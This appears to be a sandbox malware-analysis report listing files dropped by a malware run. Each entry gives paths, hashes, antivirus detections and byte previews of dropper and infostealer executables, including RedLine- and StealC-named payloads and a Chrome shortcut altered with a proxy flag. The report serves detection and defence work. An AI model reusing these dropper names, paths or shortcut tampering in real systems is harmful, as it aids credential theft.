                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="514476" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERD1C6.tmp.dmp

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Mini DuMP crash report, 14 streams, Tue Sep 24 15:34:49 2024, 0x1205a4 type
                                                      Category:dropped
                                                      Size (bytes):282298
                                                      Entropy (8bit):1.3082317350386494
                                                      Encrypted:false
                                                      SSDEEP:1536:1BuJaiqRmAG+UblnlF0sm/50LeVYu9RvvdnJ:LuJaxRmAGxnlF0smB0LeVYu9RvVn
                                                      MD5:09051FFEFA58F6CF49C52E03354E0C4A
                                                      SHA1:0252B94CA01987C7744172E9DD120F8B75A9C968
                                                      SHA-256:C8BAAC2CF13C3D1F930878CDD4998457E98CF527FD75C18A226D9D8DCE713F13
                                                      SHA-512:5DC36EA9670A0CF72831201A6868869151B56DD8FB6CA11A2C5A0C24F069EC610163D12EFD62F14D6C4CBA88797E3D72D42C8BAABC6AB0849B3612C626DFBFFF
                                                      Malicious:false
                                                      Preview:MDMP..a..... ..........f....................................4...............T.......8...........T...........H;..r............"...........$..............................................................................eJ......<%......GenuineIntel............T..............f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERD2C1.tmp.WERInternalMetadata.xml

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):8352
                                                      Entropy (8bit):3.6979138609446083
                                                      Encrypted:false
                                                      SSDEEP:192:R6l7wVeJGTI6f6YTl56Zi+rgmfp9BprA89bXJsfsdm:R6lXJ96f6YJ56Zi+rgmfzhXifr
                                                      MD5:E6233124467BA48591338019727DD609
                                                      SHA1:438993D57CA7C4D5C3911E10104610EA9C635CCB
                                                      SHA-256:6C8DEC7AF171C2ECAB6A43AF7239E55C83F92968D27FAA4EA01B4D67FE5C57B8
                                                      SHA-512:E98812A38F149A2C84B60DD8D2A08CE1A1290F8FAD0CE7C47E556FF789E258A5DB5623ED5112B2357087096485628CF3C3734625CDE7D9C6C619A2211EF5887E
                                                      Malicious:false
                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.8.1.2.<./.P.i.

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERD2F1.tmp.xml

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):4588
                                                      Entropy (8bit):4.447127550320439
                                                      Encrypted:false
                                                      SSDEEP:48:cvIwWl8zsCJg77aI9jYWpW8VYjDYm8M4JheFus+q86uopVUX9d:uIjfQI7pR7VvJCOoMX9d
                                                      MD5:EEA06699653A5E021427F7CC4FE545FC
                                                      SHA1:44C72E9F228D06D51794D2B931B3C8F84AE41C58
                                                      SHA-256:1D1A066470E0409E6904908DA7A68CBDB80A39D01B3B9710EF32E661F1CC5D14
                                                      SHA-512:D20E1A9AA8E80E117EC6903C94E393DC658AE28D56D47AE33C4788FFFE8DF3083ED11D0E7587D24BF97ADF3314776E9B1A2DFF439AF24DCD885DD83C6FD57BA1
                                                      Malicious:false
                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="514477" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                      C:\Users\Public\Desktop\Google Chrome.lnk

                                                      Download File
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:41 2023, mtime=Thu Oct 5 06:54:40 2023, atime=Wed Sep 27 08:36:54 2023, length=3242272, window=hide
                                                      Category:dropped
                                                      Size (bytes):2104
                                                      Entropy (8bit):3.4785376967984662
                                                      Encrypted:false
                                                      SSDEEP:48:8So7dvTgtI0lRYrnvPdAKRkdAGdAKRFdAKRr:8SMcq7
                                                      MD5:6C0FF8B608B2B460936EAD8474FEC5A5
                                                      SHA1:69A26CF90C05C75C72B8FB5D5DA065B83F69838F
                                                      SHA-256:B656835999CB0223CEE4E6B344BD85256C3668C133B6AFBA12CF0BF61939E71A
                                                      SHA-512:6599BFCFFFE23909AFDCE15F301E7A0EF5C19EA5CC4C3FD09B0E29C36197773394E6F1CF38BA9636C99E2482AE725589C7E30A9A33B2971DFC4E4C08A0B8DFAC
                                                      Malicious:false
                                                      Preview:L..................F.@.. ......,.....M,2a....X.&&... y1.....................#....P.O. .:i.....+00.../C:\.....................1.....EW.=..PROGRA~1..t......O.IEW.>....B...............J.......z.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VEW.8....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.8..Chrome..>......CW.VEW.8....M.....................>.i.C.h.r.o.m.e.....`.1.....EW.8..APPLIC~1..H......CW.VEW.8..........................>.i.A.p.p.l.i.c.a.t.i.o.n.....`.2. y1.;W.L .chrome.exe..F......CW.VEW.>..........................l...c.h.r.o.m.e...e.x.e.......d...............-.......c............F.......C:\Program Files\Google\Chrome\Application\chrome.exe....A.c.c.e.s.s. .t.h.e. .I.n.t.e.r.n.e.t.;.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.!.-.-.p.r.o.x.y.-.s.e.r.v.e.r

                                                      C:\Users\user\1000015002\b74664dd7e.exe

                                                      Download File
                                                      Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):1835520
                                                      Entropy (8bit):7.947999914727406
                                                      Encrypted:false
                                                      SSDEEP:49152:uVu2EnPTm/0lKfYfhA93aTyjg7dasLOzGvVtfjdRCjp:h2+Tm/mKBVgysDiz
                                                      MD5:D512CD419C532FC7D6C3A5C6C4A303A3
                                                      SHA1:3EA05F000AD46070D41E449B3F1B7419144D98FF
                                                      SHA-256:D1DC3ECA3C7794FEE2EF250E63D99101AAAE555751AB83EEFA9F8952A7F2C7D9
                                                      SHA-512:C92C15990C12770D75310B8EE32181CE165348C898CB8665AFD28BE7E4224F0876BA7AAB2667246E393C90AD3FACAB79FD03B4876D5B086D436D52188954C448
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........C..............X......m.......Y.......p.....y.........`...............\......n.....Rich............PE..L.../..f......................$......pi...........@...........................i.....6D....@.................................P.%.d.............................%..................................................................................... . ..%......(..................@....rsrc ......%......8..............@....idata ......%......8..............@... ..)...%......:..............@...fcorzhao......O......<..............@...ykxfeacd.....`i.....................@....taggant.0...pi.."..................@...................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.log

                                                      Download File
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):3473
                                                      Entropy (8bit):5.337231046311879
                                                      Encrypted:false
                                                      SSDEEP:96:Pq5qHwCYqh3oPtI6eqzxP0aymRLKTqdqlq7qqjqNqr85VD:Pq5qHwCYqh3qtI6eqzxP0at9KTqdqlqw
                                                      MD5:CE9D78C3D578A9E36A000339F683C6CC
                                                      SHA1:E12027BCD5547877CD3394EBC2661309C8B2B599
                                                      SHA-256:EC77871E87CA21102706B1D58081392CC2B1D2C266A6A1C14845ED60A6F177E9
                                                      SHA-512:A87A5885A7D1092ED5481A2E504BF0542EC7139DA09F777AF0C5948906C5D7DA3A0827FC45D118166E8C6C68015935E5DB18B77D73E1C5BB54225B1B4CC15E41
                                                      Malicious:false
                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\gold.exe.log

                                                      Download File
                                                      Process:C:\Users\user\AppData\Local\Temp\1000002001\gold.exe
                                                      File Type:CSV text
                                                      Category:dropped
                                                      Size (bytes):226
                                                      Entropy (8bit):5.360398796477698
                                                      Encrypted:false
                                                      SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
                                                      MD5:3A8957C6382192B71471BD14359D0B12
                                                      SHA1:71B96C965B65A051E7E7D10F61BEBD8CCBB88587
                                                      SHA-256:282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
                                                      SHA-512:76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
                                                      Malicious:false
                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\acentric[1].exe

                                                      Download File
                                                      Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):464896
                                                      Entropy (8bit):5.410841803375821
                                                      Encrypted:false
                                                      SSDEEP:12288:QeeeeVeeeeeegeeKVe3zJQX7MHv+xY2DxDdeeeeVeeeeeegeeKVZ3zY:QeeeeVeeeeeegeeKVe3zJ7QdeeeeVeeq
                                                      MD5:37D198AD751D31A71ACC9CB28ED0C64E
                                                      SHA1:8EB519B7A6DF66D84C566605DA9A0946717A921D
                                                      SHA-256:1ED4A8B4C74AAB435EA5CD459D5AC961E5A8CA28924801BD84D336135F30EFDE
                                                      SHA-512:60923C0A8CE5FD397D49749CCEE68CA3FE294D7323551CE9755410AC16BFFF56A35BEE3E6B9A67D57CDFCB43E4F164712F33CD255B76689174DCF4C475976C96
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 88%
                                                      Joe Sandbox View:
                                                      • Filename: jD6b7MZOhT.exe, Detection: malicious, Browse
                                                      • Filename: SecuriteInfo.com.Win32.TrojanX-gen.1325.25139.exe, Detection: malicious, Browse
                                                      • Filename: SecuriteInfo.com.Trojan.Siggen29.39642.1614.1457.exe, Detection: malicious, Browse
                                                      • Filename: file.exe, Detection: malicious, Browse
                                                      • Filename: VMRhiAFJtl.exe, Detection: malicious, Browse
                                                      • Filename: XpCyBwDzEt.exe, Detection: malicious, Browse
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.........."...0..L..........vk... ........@.. ....................................`.................................$k..O............................`.......i............................................... ............... ..H............text...|K... ...L.................. ..`.rsrc................N..............@..@.reloc.......`......................@..B................Xk......H.......(6...,...........b..0............................................0..I........~....}.....(.... ....(.....(.... <...(.....{....r...po...........o....&*....0...........('..... .u.5C. .w)F5.. C..6;..... .w)F.}8M.... .d?^;..... c...P. .u.;....8*.... .O..5.. .np.;..... .O...v8..... R,...W. ..G.;..... B.J../8.....r...p(....:....8.....r'..p(....:....8.....r-..p(....:....8.....r5..p(....-t8.....r9..p(....-h8.....rC..p(....-\+x.rM..p(....-S+i.rU..p(....-J+Z.r_..p(....-A+K.rg

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\crypted[1].exe

                                                      Download File
                                                      Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                      File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):321536
                                                      Entropy (8bit):7.984064781404801
                                                      Encrypted:false
                                                      SSDEEP:6144:/6ZNaeEuexVOkKu/A9UZMOqMVr57KLMLPQ5uRXg6hUm8:/BvOkHPEUsYLeIXgDm8
                                                      MD5:FF5AFED0A8B802D74AF1C1422C720446
                                                      SHA1:7135ACFA641A873CB0C4C37AFC49266BFEEC91D8
                                                      SHA-256:17AC37B4946539FA7FA68B12BD80946D340497A7971802B5848830AD99EA1E10
                                                      SHA-512:11724D26E11B3146E0FC947C06C59C004C015DE0AFEA24EC28A4EB8145FCD51E9B70007E17621C83F406D9AEB7CD96601245671D41C3FCC88A27C33BD7CF55AC
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 66%
                                                      Joe Sandbox View:
                                                      • Filename: jD6b7MZOhT.exe, Detection: malicious, Browse
                                                      • Filename: SecuriteInfo.com.Win32.TrojanX-gen.1325.25139.exe, Detection: malicious, Browse
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....&.f................................. ........@.. .......................@............`.....................................W............................ ......|................................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H..........................................................................h7....c73..w..V)J.:..a.W'.=.|...Q&.....p....IIoO...g...Q...P.~CM...v@.P*..Sl....a=..:u?ED."..Jp....2..r.B..H...?.v..0]2.....>..F.}.s6..N...h.#.....Z.6..g^gu.aW&.2.n?.v..*.S...}.!.^..E.h.dp.....fc4{../O..I....v.Q,U...>xK..c.D.../..E7...T...t......y...f..SC....).F.m."2...Ms.3"KL.e..zc.Bb.-.l.\......TYQ..B!.......?.......e]4...../(5......5...4.......'.[.g$.....gb;e..Q..r.Ge(a<..qC.J

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\gold[1].exe

                                                      Download File
                                                      Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                      File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):320000
                                                      Entropy (8bit):7.989223789389698
                                                      Encrypted:false
                                                      SSDEEP:6144:mmAUwI0Q3r6UBqC7e8O5rvH9MMoBfOWf6dX/mY9Row3:mmANIL3OUBqC7e15M/6d/Mw3
                                                      MD5:389881B424CF4D7EC66DE13F01C7232A
                                                      SHA1:D3BC5A793C1B8910E1ECC762B69B3866E4C5BA78
                                                      SHA-256:9D1211B3869CA43840B7DA1677B257AD37521AAB47719C6FCFE343121760B746
                                                      SHA-512:2B9517D5D9D972E8754A08863A29E3D3E3CFDE58E20D433C85546C2298AAD50AC8B069CAFD5ABB3C86E24263D662C6E1EA23C0745A2668DFD215DDBDFBD1AB96
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 100%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...g..f............................^.... ........@.. .......................@............`.....................................K............................ ....................................................... ............... ..H............text...d.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................@.......H.......h...p...........................................................>I.....=NW...S.(..`}C..P?2...h..l.<A.I.....CN..../.u..T.......@.$.0..r..."_8)L...s.YQ..%./?...L..7e&[.z.....*..j..8J...sn.=..O...|...n.....gUDG..HK....R.T...1Lz.....F..^l.y.{J..B|...`.oH.3.....VN..f.}J.../.?.......4nE.S....3A..r.M..qf..{.....!IU../.M.?>......0.e..X.f...i.Ui....`.w..fa..Lwi.VM.i.4...i..J...p....s.]....)l.......0.i$|..s....+.?..^(b|zcb.N......v.dG.e..]. ..".<x.n...h[.Y

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\newbundle2[1].exe

                                                      Download File
                                                      Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):311296
                                                      Entropy (8bit):5.082545442352462
                                                      Encrypted:false
                                                      SSDEEP:3072:Eq6EgY6iArUjOvWUJwPYT8QADFKoRJTA+tJSiK1cZqf7D34leqiOLibBOT:vqY6iULwP/xnRJTAKJ81cZqf7DIvL
                                                      MD5:58E8B2EB19704C5A59350D4FF92E5AB6
                                                      SHA1:171FC96DDA05E7D275EC42840746258217D9CAF0
                                                      SHA-256:07D4B7768E13D79AC5F05F81167B29BB6FBF97828A289D8D11EEC38939846834
                                                      SHA-512:E7655762C5F2D10EC246D11F82D437A2717AD05BE847B5E0FD055E3241CAACA85430F424055B343E3A44C90D76A0BA07A6913C2208F374F59B61F8AA4477889F
                                                      Malicious:true
                                                      Yara Hits:
                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\newbundle2[1].exe, Author: Joe Security
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 88%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0................. ... ....@.. ....................... ............@.....................................O.... ..............................h................................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\2[1].exe

                                                      Download File
                                                      Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                      File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):689664
                                                      Entropy (8bit):6.8668413422174535
                                                      Encrypted:false
                                                      SSDEEP:12288:lht5Z3o/mPatX0hz6hWIShEYZUuWygFYK1hsHyLMLH/KweErse7K4m6o/OGSew/X:lht5Z3oCadeb
                                                      MD5:B859D1252109669C1A82B235AAF40932
                                                      SHA1:B16EA90025A7D0FAD9196AA09D1091244AF37474
                                                      SHA-256:083D9BC8566B22E67B553F9E0B2F3BF6FE292220665DCC2FC10942CDC192125C
                                                      SHA-512:9C0006055AFD089EF2ACBB253628494DD8C29BAB9D5333816BE8404F875C85AC342DF82AE339173F853D3EBDB2261E59841352F78F6B4BD3BFF3D0D606F30655
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 69%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...*..f.................z..........n.... ........@.. ....................................@.....................................W....... ............................................................................ ............... ..H............text...ty... ...z.................. ..`.rsrc... ............|..............@..@.reloc..............................@..B................P.......H.......(...........J...................................................D...>n..8...2..ax...^s(O.L.~.g..?....M6...;.u....=.k.d..w-X^.k|..e..Qv.i..".n......s.W..Dl.\s.U..v..CEix.1...G....5..eM...k..[..wx1..).w..._...Tp...2F..S..U.@.6...'..qB.]O...R..0./....ES_{|..H.?...<.w.....m...f.T..e._.l.g...']..^...u..lC......{..d0...s.G....Fo.....vt.L2k|w...Sr...B.1.Y2.W".....,.}....7.*c..^........H.....p.!U...g.M7.m.......OG1......Is.>....?pEH....rO....:\....].

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\Blenar[1].exe

                                                      Download File
                                                      Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Category:modified
                                                      Size (bytes):5492542
                                                      Entropy (8bit):7.933542408650758
                                                      Encrypted:false
                                                      SSDEEP:98304:MVZklJQyhAl9gN4sldQzfC6lmzlt6yvi0WcHlPLeqNZ8hY/bUZqTxQeeBxZAsSHf:S0vOl5zqv/6H0XlPKQ8hY/b0qlteXqsF
                                                      MD5:E277DBB7AFA4631D4ABCEF9183671836
                                                      SHA1:71EF01646FA13B0A49550283D5BE12539526C724
                                                      SHA-256:3A72E66E73B857A6E2E004CFA4E6EF4EFA872AEDF7941E94637BF74B5591DEB3
                                                      SHA-512:E9DE17DB72EF4DB18615E411823A2D6A3BB8AB870B508DEFCCA8045F75C1D89F52EF7F3A9B1BC957DAD1311EF0BFB2F1A0D411F82FA3F596F1FEFB6B48F8B770
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 5%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......].N... ... ... ..m... ..m... ..m... .".#... .".%... .".$... ...... ...!.m. ...$... ...... ..."... .Rich.. .................PE..L......^.........."..........^.......|............@.................................P.T...@.....................................d.......)....................p.........................................@............................................text............................... ..`.rdata..............................@..@.data...............................@....gfids..............................@..@.rsrc...)...........................@..@.reloc.......p.......\..............@..B................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\random[1].exe

                                                      Download File
                                                      Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):1835520
                                                      Entropy (8bit):7.947999914727406
                                                      Encrypted:false
                                                      SSDEEP:49152:uVu2EnPTm/0lKfYfhA93aTyjg7dasLOzGvVtfjdRCjp:h2+Tm/mKBVgysDiz
                                                      MD5:D512CD419C532FC7D6C3A5C6C4A303A3
                                                      SHA1:3EA05F000AD46070D41E449B3F1B7419144D98FF
                                                      SHA-256:D1DC3ECA3C7794FEE2EF250E63D99101AAAE555751AB83EEFA9F8952A7F2C7D9
                                                      SHA-512:C92C15990C12770D75310B8EE32181CE165348C898CB8665AFD28BE7E4224F0876BA7AAB2667246E393C90AD3FACAB79FD03B4876D5B086D436D52188954C448
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........C..............X......m.......Y.......p.....y.........`...............\......n.....Rich............PE..L.../..f......................$......pi...........@...........................i.....6D....@.................................P.%.d.............................%..................................................................................... . ..%......(..................@....rsrc ......%......8..............@....idata ......%......8..............@... ..)...%......:..............@...fcorzhao......O......<..............@...ykxfeacd.....`i.....................@....taggant.0...pi.."..................@...................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\random[2].exe

                                                      Download File
                                                      Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):1835520
                                                      Entropy (8bit):7.947999914727406
                                                      Encrypted:false
                                                      SSDEEP:49152:uVu2EnPTm/0lKfYfhA93aTyjg7dasLOzGvVtfjdRCjp:h2+Tm/mKBVgysDiz
                                                      MD5:D512CD419C532FC7D6C3A5C6C4A303A3
                                                      SHA1:3EA05F000AD46070D41E449B3F1B7419144D98FF
                                                      SHA-256:D1DC3ECA3C7794FEE2EF250E63D99101AAAE555751AB83EEFA9F8952A7F2C7D9
                                                      SHA-512:C92C15990C12770D75310B8EE32181CE165348C898CB8665AFD28BE7E4224F0876BA7AAB2667246E393C90AD3FACAB79FD03B4876D5B086D436D52188954C448
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........C..............X......m.......Y.......p.....y.........`...............\......n.....Rich............PE..L.../..f......................$......pi...........@...........................i.....6D....@.................................P.%.d.............................%..................................................................................... . ..%......(..................@....rsrc ......%......8..............@....idata ......%......8..............@... ..)...%......:..............@...fcorzhao......O......<..............@...ykxfeacd.....`i.....................@....taggant.0...pi.."..................@...................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\stealc_default2[1].exe

                                                      Download File
                                                      Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):192000
                                                      Entropy (8bit):6.395265378509869
                                                      Encrypted:false
